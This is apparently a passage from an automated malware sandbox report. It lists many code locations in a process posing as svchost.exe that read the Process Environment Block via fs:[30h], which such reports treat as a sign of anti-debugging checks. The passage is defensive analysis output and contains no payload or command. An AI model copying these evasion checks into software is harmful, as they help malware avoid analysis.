            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031533A5 mov eax, dword ptr fs:[00000030h]1_2_031533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031633A0 mov eax, dword ptr fs:[00000030h]1_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031633A0 mov eax, dword ptr fs:[00000030h]1_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320539D mov eax, dword ptr fs:[00000030h]1_2_0320539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EB3D0 mov ecx, dword ptr fs:[00000030h]1_2_031EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]1_2_031EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]1_2_031B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032053FC mov eax, dword ptr fs:[00000030h]1_2_032053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]1_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF3E6 mov eax, dword ptr fs:[00000030h]1_2_031EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205227 mov eax, dword ptr fs:[00000030h]1_2_03205227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03167208 mov eax, dword ptr fs:[00000030h]1_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03167208 mov eax, dword ptr fs:[00000030h]1_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]1_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]1_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EB256 mov eax, dword ptr fs:[00000030h]1_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EB256 mov eax, dword ptr fs:[00000030h]1_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]1_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129240 mov eax, dword ptr fs:[00000030h]1_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129240 mov eax, dword ptr fs:[00000030h]1_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316724D mov eax, dword ptr fs:[00000030h]1_2_0316724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03159274 mov eax, dword ptr fs:[00000030h]1_2_03159274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03171270 mov eax, dword ptr fs:[00000030h]1_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03171270 mov eax, dword ptr fs:[00000030h]1_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FD26B mov eax, dword ptr fs:[00000030h]1_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FD26B mov eax, dword ptr fs:[00000030h]1_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]1_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316329E mov eax, dword ptr fs:[00000030h]1_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316329E mov eax, dword ptr fs:[00000030h]1_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205283 mov eax, dword ptr fs:[00000030h]1_2_03205283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B92BC mov eax, dword ptr fs:[00000030h]1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B92BC mov eax, dword ptr fs:[00000030h]1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B92BC mov ecx, dword ptr fs:[00000030h]1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B92BC mov ecx, dword ptr fs:[00000030h]1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h]1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h]1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h]1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h]1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h]1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h]1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h]1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h]1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C72A0 mov eax, dword ptr fs:[00000030h]1_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C72A0 mov eax, dword ptr fs:[00000030h]1_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B2D3 mov eax, dword ptr fs:[00000030h]1_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B2D3 mov eax, dword ptr fs:[00000030h]1_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B2D3 mov eax, dword ptr fs:[00000030h]1_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032052E2 mov eax, dword ptr fs:[00000030h]1_2_032052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315F2D0 mov eax, dword ptr fs:[00000030h]1_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315F2D0 mov eax, dword ptr fs:[00000030h]1_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h]1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031392C5 mov eax, dword ptr fs:[00000030h]1_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031392C5 mov eax, dword ptr fs:[00000030h]1_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF2F8 mov eax, dword ptr fs:[00000030h]1_2_031EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031292FF mov eax, dword ptr fs:[00000030h]1_2_031292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h]1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]1_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03131131 mov eax, dword ptr fs:[00000030h]1_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03131131 mov eax, dword ptr fs:[00000030h]1_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h]1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h]1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h]1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h]1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]1_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03137152 mov eax, dword ptr fs:[00000030h]1_2_03137152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]1_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]1_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129148 mov eax, dword ptr fs:[00000030h]1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129148 mov eax, dword ptr fs:[00000030h]1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129148 mov eax, dword ptr fs:[00000030h]1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129148 mov eax, dword ptr fs:[00000030h]1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h]1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C9179 mov eax, dword ptr fs:[00000030h]1_2_031C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205152 mov eax, dword ptr fs:[00000030h]1_2_03205152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03187190 mov eax, dword ptr fs:[00000030h]1_2_03187190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]1_2_03170185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314B1B0 mov eax, dword ptr fs:[00000030h]1_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]1_2_032061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316D1D0 mov eax, dword ptr fs:[00000030h]1_2_0316D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316D1D0 mov ecx, dword ptr fs:[00000030h]1_2_0316D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D71F9 mov esi, dword ptr fs:[00000030h]1_2_031D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032051CB mov eax, dword ptr fs:[00000030h]1_2_032051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]1_2_031601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
